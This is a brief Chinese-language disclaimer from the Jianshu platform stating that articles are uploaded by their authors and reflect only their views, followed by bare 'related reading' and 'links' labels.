平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容